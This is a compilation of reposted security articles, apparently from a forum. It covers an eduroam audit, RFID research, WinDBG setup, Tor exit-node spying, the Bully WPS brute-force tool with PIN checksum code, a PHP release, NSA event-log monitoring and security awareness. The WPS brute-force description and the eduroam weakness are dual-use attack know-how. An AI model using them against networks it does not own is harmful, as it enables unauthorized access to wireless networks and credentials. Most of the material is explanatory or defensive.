But not all of them are fixed (for example the one for wpa_supplicant) and I do not think that they will fix all of them. And even so, fixing the tutorials will not help where a lot of students and university staff have already applied the flawed configurations.

Errata

At the time of writing this article, I had not tested this statement. I just based it on the settings you can make in an access point, the statement of my university and the statement my friend had made. However, yesterday night I drove to the next city to test this statement at another university (the TU Dortmund). Honestly, I did not expect this result:

wlan0: Trying to associate with SSID 'eduroam'
wlan0: Associated with 00:14:a8:14:86:f1
wlan0: CTRL-EVENT-EAP-STARTED EAP authentication started
wlan0: CTRL-EVENT-EAP-PROPOSED-METHOD vendor=0 method=21
wlan0: CTRL-EVENT-EAP-METHOD EAP vendor 0 method 21 (TTLS) selected
wlan0: CTRL-EVENT-EAP-PEER-CERT depth=3 subject='/C=DE/O=Deutsche Telekom AG/OU=T-TeleSec Trust Center/CN=Deutsche Telekom Root CA 2'
wlan0: CTRL-EVENT-EAP-PEER-CERT depth=2 subject='/C=DE/O=DFN-Verein/OU=DFN-PKI/CN=DFN-Verein PCA Global - G01'
wlan0: CTRL-EVENT-EAP-PEER-CERT depth=1 subject='/C=DE/ST=Nordrhein-Westfalen/L=Bochum/O=Ruhr-Universitaet Bochum/CN=Ruhr-Universitaet Bochum CA/emailAddress=rubca@ruhr-uni-bochum.de'
wlan0: CTRL-EVENT-EAP-PEER-CERT depth=0 subject='/C=DE/ST=Nordrhein-Westfalen/L=Bochum/O=Ruhr-Universitaet Bochum/CN=radius.ruhr-uni-bochum.de'
EAP-TTLS: Phase 2 MSCHAPV2 authentication succeeded

The wpa_supplicant output shows that even when I am at another university in Germany and use eduroam there, the CA chain looks the same as at my own university. This means that my WiFi client still connects to the radius server of my university. I did not expect that (and do not really have an idea how this infrastructure works exactly). Unfortunately, I have no way to test it with a university in a foreign country.
Nevertheless, my conclusion that a dedicated CA should have been used for the eduroam infrastructure remains the same.

Sursa: eduroam WiFi security audit or why it is broken by design - sqall's blog
19. Near error-free wireless detection made possible

Date: January 23, 2014
Source: University of Cambridge

Summary: A new long-range wireless tag detection system, with potential applications in health care, environmental protection and goods tracking, can pinpoint items with near 100 percent accuracy over a much wider range than current systems.

A new long-range wireless tag detection system, with potential applications in health care, environmental protection and goods tracking, can pinpoint items with near 100 per cent accuracy over a much wider range than current systems.

The accuracy and range of radio frequency identification (RFID) systems, which are used in everything from passports to luggage tracking, could be vastly improved thanks to a new system developed by researchers at the University of Cambridge. The vastly increased range and accuracy of the system opens up a wide range of potential monitoring applications, including support for the sick and elderly, real-time environmental monitoring in areas prone to natural disasters, or paying for goods without the need for conventional checkouts.

The new system improves the accuracy of passive (battery-less) RFID tag detection from roughly 50 per cent to near 100 per cent, and increases the reliable detection range from two to three metres to approximately 20 metres. The results are outlined in the journal IEEE Transactions on Antennas and Propagation.

RFID is a widely-used wireless sensing technology which uses radio waves to identify an object in the form of a serial number. The technology is used for applications such as baggage handling in airports, access badges, inventory control and document tracking. RFID systems are composed of a reader and a tag, and unlike conventional bar codes, the reader does not need to be in line of sight with the tag in order to detect it, meaning that tags can be embedded inside an object, and that many tags can be detected at once.
Additionally, the tags require no internal energy source or maintenance, as they get their power from the radio waves interrogating them.

"Conventional passive UHF RFID systems typically offer a lower useful read range than this new solution, as well as lower detection reliability," said Dr Sithamparanathan Sabesan of the Centre for Photonic Systems in the Department of Engineering. "Tag detection accuracy usually degrades at a distance of about two to three metres, and interrogating signals can be cancelled due to reflections, leading to dead spots within the radio environment."

Several other methods of improving passive RFID coverage have been developed, but they do not address the issue of dead spots. However, by using a distributed antenna system (DAS) of the type commonly used to improve wireless communications within a building, Dr Sabesan and Dr Michael Crisp, along with Professors Richard Penty and Ian White, were able to achieve a massive increase in RFID range and accuracy. By multicasting the RFID signals over a number of transmitting antennas, the researchers were able to dynamically move the dead spots to achieve an effectively error-free system. Using four transmitting and receiving antenna pairs, the team were able to reduce the number of dead spots in the system from nearly 50 per cent to zero over a 20 by 15 metre area. In addition, the new system requires fewer antennas than current technologies.

In most of the RFID systems currently in use, the best way to ensure an accurate reading of the tags is to shorten the distance between the antennas and the tags, meaning that many antennas are required to achieve an acceptable accuracy rate. Even so, it is impossible to achieve completely accurate detection. But by using a DAS RFID system to move the location of dead spots away from the tag, an accurate read becomes possible without the need for additional antennas.
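A toy interference model illustrates why shifting the relative phase between two transmit antennas moves the dead spots: a point where the two carriers arrive in anti-phase (and cancel) stops cancelling once one antenna's phase is flipped. This is only an illustrative sketch — the antenna positions, wavelength and threshold below are made-up values, not parameters from the Cambridge paper:

```python
import cmath
import math

WAVELENGTH = 0.33  # metres; roughly a 915 MHz UHF RFID carrier (assumed value)
ANTENNA_A, ANTENNA_B = 0.0, 10.0  # antenna positions on a line, in metres

def field_strength(x: float, phase_offset: float) -> float:
    """Magnitude of the summed field from both antennas at point x.

    phase_offset is an extra phase applied to antenna B only.
    """
    d1, d2 = abs(x - ANTENNA_A), abs(x - ANTENNA_B)
    p1 = cmath.exp(2j * math.pi * d1 / WAVELENGTH)
    p2 = cmath.exp(1j * (2 * math.pi * d2 / WAVELENGTH + phase_offset))
    return abs(p1 + p2)

def first_dead_spot(phase_offset: float, threshold: float = 0.2) -> float:
    """Scan 1 m .. 9 m in 1 cm steps for the first near-cancellation point."""
    for i in range(100, 901):
        x = i / 100
        if field_strength(x, phase_offset) < threshold:
            return x
    raise RuntimeError("no dead spot found")

# A point that is a dead spot with offset 0 becomes readable once the offset flips:
x0 = first_dead_spot(0.0)
# field_strength(x0, math.pi) is now close to the 2.0 constructive maximum
```

A reader that alternates between the two phase settings therefore sees every tag in at least one configuration, which is the intuition behind "dynamically moving" the dead spots.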
The team is currently working to add location functionality to the RFID DAS system which would allow users to see not only which zone a tagged item was located in, but also approximately where it was within that space. The system, recognised by the award of the 2011 UK RAEng/ERA Innovation Prize, is being commercialised by the Cambridge team. This will allow organisations to inexpensively and effectively monitor RFID tagged items over large areas. The research was funded by the Engineering and Physical Sciences Research Council (EPSRC) and Boeing. Sursa: Near error-free wireless detection made possible -- ScienceDaily
20. [h=3]Getting Started with WinDBG - Part 1[/h]

By Brad Antoniewicz.

WinDBG is an awesome debugger. It may not have a pretty interface or a black background by default, but it is still one of the most powerful and stable Windows debuggers out there. In this article I'll introduce you to the basics of WinDBG to get you off the ground and running. This is part one of a multipart series; here's our outline of what's in store:

Part 1 - Installation, Interface, Symbols, Remote/Local Debugging, Help, Modules, and Registers
Part 2 - Breakpoints
Part 3 - Inspecting Memory, Stepping Through Programs, and General Tips and Tricks

In this blog post we'll cover installing and attaching to a process, then in the next blog post we'll go over breakpoints, stepping, and inspecting memory.

[h=1]Installation[/h]

Microsoft has changed things slightly in WinDBG's installation from Windows 7 to Windows 8. In this section we'll walk through the install on both.

[h=2]Windows 8[/h]

For Windows 8, Microsoft includes WinDBG in the Windows Driver Kit (WDK). You can install Visual Studio and the WDK, or just install the standalone "Debugging Tools for Windows 8.1" package that includes WinDBG. This is basically a thin installer that needs to download WinDBG after you walk through a few screens. The install will ask you if you'd like to install locally or download the development kit for another computer. The latter is the equivalent of an offline installer, which is my preference, so that you can install on other systems easily in the future. From there just Next your way to the features page, deselect everything but "Debugging Tools for Windows" and click "Download". Once the installer completes you can navigate to your download directory, which is c:\Users\Username\Downloads\Windows Kits\8.1\StandaloneSDK by default, and then next through that install. Then you're all ready to go!
[h=2]Windows 7 and Below[/h]

For Windows 7 and below, Microsoft offers WinDBG as part of the "Debugging Tools for Windows" package that is included within the Windows SDK and .NET Framework. This requires you to download the online/offline installer, then specifically choose the "Debugging Tools for Windows" install option. My preference is to check the "Debugging Tools" option under "Redistributable Packages" and create a standalone installer, which makes future debugging efforts a heck of a lot easier. That's what I'll do here. Once the installation completes, you should have the redistributables for the various platforms (x86/x64) in the c:\Program Files\Microsoft SDKs\Windows\v7.1\Redist\Debugging Tools for Windows\ directory. From there the installation is pretty simple: just copy the appropriate redistributable to the system you're debugging and then click through the installation.

Articol complet: http://blog.opensecurityresearch.com/2013/12/getting-started-with-windbg-part-1.html
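Once WinDBG is installed, one setting worth configuring right away is the symbol path (symbols are covered later in this series). A commonly used value, pointing WinDBG at a local cache backed by Microsoft's public symbol server, looks like this — the C:\Symbols cache directory is an arbitrary choice:

```
_NT_SYMBOL_PATH=srv*C:\Symbols*https://msdl.microsoft.com/download/symbols
```

Set it as an environment variable (or via .sympath inside WinDBG) and downloaded symbols get cached locally so subsequent debugging sessions start faster.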
21. Who is spying on Tor network exit nodes from Russia?

by paganinip on January 23rd, 2014

Researchers Winter and Lindskog identified 25 nodes of the Tor network that tampered with web traffic, decrypted the traffic, or censored websites.

Two researchers, Philipp Winter and Stefan Lindskog of Karlstad University in Sweden, presented the results of a four-month study conducted to test Tor network exit nodes for sneaky behavior. It has been discovered that an unspecified Russian entity is eavesdropping on nodes at the edge of the Tor network. The researchers used a custom tool for their analysis and discovered that the entity appeared to be particularly interested in users' Facebook traffic.

Winter and Lindskog identified 25 nodes that tampered with web traffic, decrypted the traffic, or censored websites. Of the compromised nodes, 19 were running man-in-the-middle attacks on users, decrypting and re-encrypting traffic on the fly.

The Tor network anonymizes a user's web traffic, under specific conditions, by bouncing encrypted traffic through a series of nodes before accessing the web site through any of over 1,000 "exit nodes."

The study is based on two fundamental considerations:

User traffic is vulnerable at the exit nodes. The transit of traffic through an exit node exposes it to eavesdropping by bad actors. A well-known case is WikiLeaks, which was initially launched with documents intercepted from the Tor network by eavesdropping on Chinese hackers through a bugged exit node.

Tor nodes are run by volunteers, who can easily set up and take down their servers whenever they need or want to.

The attackers in these cases adopted a bogus digital certificate to access traffic content; in the remaining 6 cases the impairment resulted from configuration mistakes or ISP issues.
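The core detection idea is simple: compare the certificate a site presents through a Tor exit with the one it presents on a direct connection — a MITM exit has to substitute its own. A minimal sketch of just the comparison step follows (fetching a certificate through Tor needs a SOCKS-capable client and is out of scope here; the function and record names are my own, not the researchers' tool):

```python
import hashlib
import ssl

def fingerprint(pem_cert: str) -> str:
    """SHA-256 fingerprint of a certificate supplied in PEM form."""
    der = ssl.PEM_cert_to_DER_cert(pem_cert)
    return hashlib.sha256(der).hexdigest()

def looks_tampered(clear_web_pem: str, via_tor_pem: str) -> bool:
    """Flag a possible MITM exit node: the certificate seen through Tor
    should be byte-for-byte the one seen on a direct connection."""
    return fingerprint(clear_web_pem) != fingerprint(via_tor_pem)
```

On a direct connection the PEM can be obtained with ssl.get_server_certificate((host, 443)); a mismatch against the Tor-fetched copy is exactly the signal that exposed the "Main Authority" self-signed certificate.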
The study revealed that the nodes used to tamper with the traffic were configured to intercept only data streams for specific websites, including Facebook, probably to avoid detection of their activity.

The researchers detected the eavesdropping on unencrypted web traffic at the exit nodes by checking the digital certificates used over Tor connections against the certificates used in direct "clear-web" sessions; they discovered numerous exit nodes located in Russia that were used to perform man-in-the-middle attacks. The attackers controlling the Russian nodes accessed the traffic and re-encrypted it with their own self-signed digital certificate issued to the made-up entity "Main Authority."

It appears to be a well-organized operation: the researchers noted that when the "Main Authority" Tor nodes were blacklisted, new ones using the same certificate were set up by the same entity.

It is not clear who is behind the attack. Winter and Lindskog believe that the spying operation was conducted by isolated individuals rather than a government agency, because the technique adopted is too noisy: the attackers used a self-signed certificate that causes browser warnings for Tor users. "It was actually done pretty stupidly," says Winter.

It must also be considered that intelligence agencies, including the NSA, are spending great effort to infiltrate the Tor network; one of the documents leaked by Edward Snowden on US surveillance expressly refers to a project, codenamed "Tor Stinks", to track profiles in the deep web.

Despite the high interest in the Tor network and its potential, the network is still considered the best way to protect a user's anonymity online, and governments don't want this.

Pierluigi Paganini (Security Affairs – Tor network, Russia)

Sursa: Who is spying on Tor network exit nodes from Russia?
22. Retrieve WPA/WPA2 passphrase from a WPS enabled access point.

[h=1]OVERVIEW[/h]

Bully is a new implementation of the WPS brute force attack, written in C. It is conceptually identical to other programs, in that it exploits the (now well known) design flaw in the WPS specification. It has several advantages over the original reaver code. These include fewer dependencies, improved memory and CPU performance, correct handling of endianness, and a more robust set of options. It runs on Linux, and was specifically developed to run on embedded Linux systems (OpenWrt, etc.) regardless of architecture.

Bully provides several improvements in the detection and handling of anomalous scenarios. It has been tested against access points from numerous vendors, and with differing configurations, with much success.

Source: https://github.com/bdpurcell/bully
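The design flaw in question is well documented: the access point acknowledges the first and second halves of the eight-digit PIN independently, and the last digit is a checksum, so a brute force needs at most 10^4 + 10^3 = 11,000 guesses instead of 10^8. A sketch of the standard WPS checksum computation (the same algorithm reaver and bully implement):

```python
def wps_checksum(pin7: int) -> int:
    """Checksum digit for the first seven digits of a WPS PIN."""
    accum = 0
    while pin7:
        accum += 3 * (pin7 % 10)  # odd-position digit, weight 3
        pin7 //= 10
        accum += pin7 % 10        # even-position digit, weight 1
        pin7 //= 10
    return (10 - accum % 10) % 10

def full_pin(pin7: int) -> int:
    """Append the checksum digit to get the eight-digit PIN."""
    return pin7 * 10 + wps_checksum(pin7)

# The protocol confirms the 4-digit first half separately from the 3-digit
# second half (the 8th digit is derived), so the worst-case search space is
# 10**4 + 10**3 = 11,000 attempts rather than 10**8.
```

This is why a WPS PIN typically falls in hours even at modest guess rates, regardless of how strong the WPA/WPA2 passphrase behind it is.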
23. [h=1]PHP 5.6.0 Alpha 1 Supports File Uploads Bigger than 2GB[/h]

January 25th, 2014, 14:45 GMT · By Silviu Stahie

PHP, an HTML-embedded scripting language with syntax borrowed from C, Java, and Perl, with a couple of unique PHP-specific features thrown in, has been updated to version 5.6.0 Alpha 1.

PHP 5.x includes a new OOP model based on the Zend Engine 2.0, a new extension for improved MySQL support, built-in native support for SQLite, and much more.

According to the changelog, constant scalar expressions have been implemented, variadic functions have been added, and argument unpacking has been added. Also, support for large (>2 GiB) file uploads has been added, SSL/TLS improvements have been implemented, and a new command line debugger called phpdbg is now available.

You can check out the official changelog in the readme file incorporated in the source package for more details about this release. Download PHP 5.6.0 Alpha 1 right now from Softpedia.

Sursa: PHP 5.6.0 Alpha 1 Supports File Uploads Bigger than 2GB
24. Spotting the Adversary with Windows Event Log Monitoring

Author: National Security Agency/Central Security Service

Contents
1 Introduction
2 Deployment
2.1 Ensuring Integrity of Event Logs
2.2 Environment Requirements
2.3 Log Aggregation on Windows Server 2008 R2
2.4 Configuring Source Computer Policies
2.5 Disabling Windows Remote Shell
2.6 Firewall Modification
2.7 Restricting WinRM Access
2.8 Disabling WinRM and Windows Collector Service
3 Hardening Event Collection
3.1 WinRM Authentication Hardening Methods
3.2 Secure Sockets Layer and WinRM
4 Recommended Events to Collect
4.1 Application Whitelisting
4.2 Application Crashes
4.3 System or Service Failures
4.4 Windows Update Errors
4.5 Windows Firewall
4.6 Clearing Event Logs
4.7 Software and Service Installation
4.8 Account Usage
4.9 Kernel Driver Signing
4.10 Group Policy Errors
4.11 Windows Defender Activities
4.12 Mobile Device Activities
4.13 External Media Detection
4.14 Printing Services
4.15 Pass the Hash Detection
4.16 Remote Desktop Logon Detection
5 Event Log Retention
6 Final Recommendations
7 Appendix
7.1 Subscriptions
7.2 Event ID Definitions
7.3 Windows Remote Management Versions
7.4 WinRM 2.0 Configuration Settings
7.5 WinRM Registry Keys and Values
7.6 Troubleshooting
8 Works Cited

Download: http://www.nsa.gov/ia/_files/app/Spotting_the_Adversary_with_Windows_Event_Log_Monitoring.pdf
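Section 4 of the guide enumerates high-value event IDs to collect (log clearing, service installation, account usage, and so on). As a minimal sketch of what acting on such a list looks like, here is a triage filter over already-exported log records — the record format (dicts with "id" and "host" keys) is a made-up example, but the event IDs are standard Windows identifiers: 1102 (security log cleared), 104 (system log cleared), 4720 (account created), 7045 (service installed):

```python
# Well-known Windows event IDs matching the guide's "Recommended Events
# to Collect"; the record format here is a made-up illustration.
SUSPICIOUS = {
    1102: "Security audit log was cleared",
    104: "System event log was cleared",
    4720: "A user account was created",
    7045: "A new service was installed",
}

def triage(records):
    """Return (host, event_id, description) for every suspicious record."""
    hits = []
    for rec in records:
        if rec["id"] in SUSPICIOUS:
            hits.append((rec["host"], rec["id"], SUSPICIOUS[rec["id"]]))
    return hits

sample = [
    {"host": "ws01", "id": 4624},   # ordinary logon, ignored here
    {"host": "ws01", "id": 1102},   # log cleared: classic attacker cleanup
    {"host": "srv02", "id": 7045},  # new service: common persistence step
]
# triage(sample) flags the 1102 and 7045 records
```

In practice this filtering would run on the collector described in section 2, fed by Windows Event Forwarding subscriptions rather than a hand-built list.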
25. Improving the Human Firewall

Introduction

Most likely you will agree that security education is the thing that needs enhancement the most in companies worldwide. It is pointless to spend millions of dollars on the most recent software and hardware to defend corporate networks against all kinds of internal and external threats, only to get your systems exposed because an employee was tricked into divulging his credentials, just as Kevin Mitnick stated. The saying goes: "A chain is only as strong as its weakest link", and it is tightly related to information security, as attackers test all possible points of access for vulnerabilities and usually choose the least resistant one.

A report from Wisegate, a peer-based IT knowledge service, states that the threat from internal computer users is one of the biggest concerns when it comes to protecting corporate data. Furthermore, Wisegate claims that user security awareness was a top concern in 2013. Most companies already do training and have a relatively high expenditure on computer-based training programs. These trainings just do not prove as effective as intended.

The key issue here is to differentiate between training and education: training employees involves actions, while educating them involves results. The main goal of security awareness programs has to be aimed not at training the staff but at educating them and making them aware of the ways human psychology can be exploited. Hence, you need to bring effective results to the table instead of performing more and more actions. To achieve these results you need to make your staff grasp the concepts you are teaching them to the extent that they can act properly when confronted with new situations. This means that your staff has to internalize the knowledge and information provided by your security awareness program. This cannot be achieved merely by conducting training, leaving notes and hanging up posters.
Isn’t the average Internet user already aware of the security issues that he might be confronted with? To illustrate our point, we looked at the trends in Google search for the following keywords: The following results were shown: The results show that the trend of the search volumes for malware and phishing is highly inelastic (static). Compared to the search queries for keygens and torrents, the relative search volume of phishing and malware is quite small between 2004 and 2007. There is no data for the word social engineering for most periods due to its low demand. We see from the red and purple curve above that between 2004 and 2007 many Internet users demanded keygens and torrents to get illegal access to paid software (at a generally declining rate) but their awareness of possible implications of keygens such as malware and social engineering remained relatively stagnant. From year 2008 up to now we see a slight increase in the search tendency for malware and phishing while the query tendency for keygen and torrents have been falling at an increasing rate and the forecast is that the queries for keygens and maybe torrents are going to fall below those of malware and phishing. Still, we can see that security awareness has had some impact on the behavior of Internet users, making them stray from the dark side of the Internet. Nonetheless, this decline of piracy and risky behavior is also due to other reasons such as better enforcement of copyright laws, removal of access to websites with illegal contents by ISPs, closure of online businesses operating in the grey market by governments, inter alia. However, if we compare the queries for torrents with the queries for virus and antivirus we get a pretty interesting picture. It appears that nowadays antivirus is as demanded a keyword as virus and more demanded than keygen, torrents, social engineering, phishing, malware. 
It appears that end-users rely not on prevention but on post-infection treatment as a safety mechanism. Also, the keywords "virus" and "anti-virus" are trending more than "torrents" and are multiple times more popular than "social engineering", "phishing" and "malware", which pinpoints the low safety precautions of the average Internet user: responsibility for Web safety appears to end with installing anti-virus software, while safe use of the Internet is ignored. Related queries for "virus" appear to be "anti virus", "virus download", "antivirus", "virus scan", "free anti virus", "avg", "avg virus", "virus removal" and "virus protection", among others, which shows the overall direction of users' input for the keyword "virus".

We can conclude from the above illustrations that the need for Web safety and security awareness is as high as ever, pinpointing the need to improve the current security awareness programs that companies undertake.

If I have to educate and not train, what should I change?

Firstly, you should start by organizing group lunches with a security-oriented purpose. Each employee will appreciate a good lunch and/or dessert, so attendance at such meetings will be high. Such an informal meeting is a great way to get your staff together and talk about security issues. Most likely, organizing lunches once or twice a week for different groups will raise the security awareness of your staff without having to resort to dry lectures, relying instead on overall participation and group-wide discussion. In these lunches, you can begin to spot regular attendees who have the potential to become champions within the different work groups and who can later on help educate the other employees in their group.

Secondly, you can try to bring in outside security professionals, as they are usually eager to get CPE (continuing professional education) credits, even more so if you add some goodwill gesture.
The local security pros may present security issues or discuss security with your employees.

Thirdly, you should provide your employees with information on maintaining Internet safety at home. Such discussions are always well-attended, even more so if you show them something relevant, such as how to keep kids safe at home. The information must really affect them personally, and they must find it relevant, to keep them focused and engaged so that they can absorb it. Links, whitepapers and any kind of training on such topics will be well received.

Fourthly, you should make appointments with business unit leaders to discuss security issues and topics relevant to their area. It does not have to be in the office; more informal settings are also beneficial. The point here is that it is important to show them that you are pondering their problems and attempting to remedy them; in this way they can understand and help with your concerns as well.

Fifthly, the old way of hanging posters on the wall and distributing newsletters can also be effective. The posters have to be attention-grabbing and have to be replaced frequently. A column in a newsletter is beneficial if it is interesting and relevant. Tips are usually not interesting and relevant, as they are self-serving, unless they provide some advice on safety at home, which automatically makes them relevant.

Sixthly, anecdotes and metaphors may help spread the word. For instance, you can rely on the story of Ali Baba to teach the staff about password security, strength and shoulder surfing.

Seventhly, create a security mentoring/tutoring option. It is possible that nobody signs up for it, but if someone does you should enable him to take advantage of such an option. The mentoring may include one-on-one sessions; it will help in pinpointing employees gifted in security awareness and will help shape a champion among your employees who will educate the others during the course of work.
Eighthly, you should offer your employees ride-alongs, whereby you give them the opportunity to take a look at how the IT or security program actually works from the inside. The opposite should be done as well: having IT and security staff take a glimpse of what a day in the workplace of the other employees looks like may also be useful.

Finally, you should strive to create an environment of teamwork, as it is proven that good teamwork brings several positive features with it, such as:

Better problem-solving capabilities
Quicker completion of tasks
Competition which leads personnel to excel at what they do
A combination of different unique qualities, which may lead to better efficiency in the employees' decision-making

(References regarding these four features can be found at the bottom of the article.) As Henry Ford once said: "Coming together is a beginning. Keeping together is progress. Working together is success."

Testing the human firewall

Testing the human firewall is easy, so you can effortlessly track the company's progress. The first and most employed way to test the human firewall is through written tests, which come in the form of online multiple-choice tests and usually take place after a computer-based learning session. Alternatively, you can test the human firewall with a seemingly real social engineering attack. You have various techniques at your disposal for the attack: pretexting, phishing, theft with diversion, tailgating, quid pro quo or any combination of these. You can resort to websites such as phishme.com to run a fake phishing campaign against your company, do the attack yourself, or hire external security professionals to raise the bar even higher. Below are 3 sample questions that may be used in multiple-choice tests and 3 open questions that require a written answer. Similar questions can be used when testing your personnel's security awareness.

What are some important tips when it comes to improving the human firewall?
- Simple labels that classify data as protected and unprotected, such as "confidential" and "public", are a great place to start.
- Prohibiting password reuse and teaching the human firewall good password habits is crucial.
- The security staff have to become more accessible to the employees. This, on its own, will motivate the latter to share their problems and ask questions, on the one hand, and will help the security staff assess the effectiveness of their security programs, on the other.
- When reporting the results of security awareness tests, it is preferable to share them anonymously or statistically. If negative trends do emerge from particular employees or groups of employees, share those results with the proper persons and attempt to solve the issues without putting any blame on the people who fall behind in their security education.
- Teach employees not to store any company data on their smartphones.
- Teach personnel not to connect USB drives, external hard disks or any writable media to workplace computers.
- To reduce social engineering attacks against your employees, limit the information that can be gathered about them during the reconnaissance stage of an attack (this involves educating them not to divulge too much information about themselves in the public domain):
  - Remove any organization charts that reveal employees' names, job positions and photos from the company's public website.
  - Teach personnel to handle external contacts properly through systematic training.
  - Teach personnel not to respond to accusations instantly, but to turn to colleagues, legal staff, etc. before handling complaints.
  - Teach personnel to limit the information they provide on social networks and other public sources such as Facebook.

Conclusion

It can be concluded from our discussion above that attempts at improving the human firewall have already started worldwide.
Their success varies depending on factors such as the employees' preliminary level of awareness and the enforceability and rigidity of the laws in the particular country, inter alia. Most methods of improving the human firewall modify strategies the companies already have in place: transforming the information delivered to employees so that it becomes relevant to them and affects them personally, or reworking posters and newsletters to drop generic tips in favor of anecdotes and metaphors that encourage employees to read the advice and help them remember the rules. Others, such as ride-alongs that let the IT staff better understand the other employees and vice versa, amount to an entirely new strategy for some companies. We have also seen that testing the results of such security awareness education takes little effort yet is highly valuable, as it can reveal the weak spots, or weakest links, of your human firewall. Finally, we have provided some advice addressing relatively recent issues in the operation of the human firewall. For instance, prohibiting the storage of company data on smartphones is one possible solution to the BYOD problem, which has emerged only recently.

References:

Richard O'Hanley, James S. Tiller and others, 'Information Security Management Handbook', 6th edition, Volume 7
Munir Kotadia, "'Human firewall' a crucial defence: Mitnick", Apr 14, 2005, Available at: 'Human firewall' a crucial defence: Mitnick | ZDNet
Laneye, 'Managers under attack', Available at: Social Engineering - Managers under attack
Business Wire, 'New Research from Wisegate Reveals Why Security Awareness is Top Concern of CISOs in 2013', Jan 23, 2013, Available at: New Research from Wisegate Reveals Why Security Awareness is Top Concern of CISOs in 2013 | Business Wire
University of California, Merced, 'Security Self-Test: Questions and Scenarios', Available at: Security Self-Test: Questions and Scenarios | Information Technology
Ken Hess, 'The second most important BYOD security defense: user awareness', Feb 25, 2013, Available at: The second most important BYOD security defense: user awareness | ZDNet
LePine, Jeffery A., Ronald F. Piccolo, Christine L. Jackson, John E. Mathieu, and Jessica R. Saul (2008). "A Meta-Analysis of Teamwork Processes: Tests of a Multidimensional Model and Relationships with Team Effectiveness Criteria". Personnel Psychology 61 (2): 273-307.
Hoegl, Martin, and Hans Georg Gemuenden (2001). "Teamwork Quality and the Success of Innovative Projects: A Theoretical Concept and Empirical Evidence". Organization Science 12 (4): 435-449.

By Ivan Dimov | January 24th, 2014
Sursa: Improving the Human Firewall - InfoSec Institute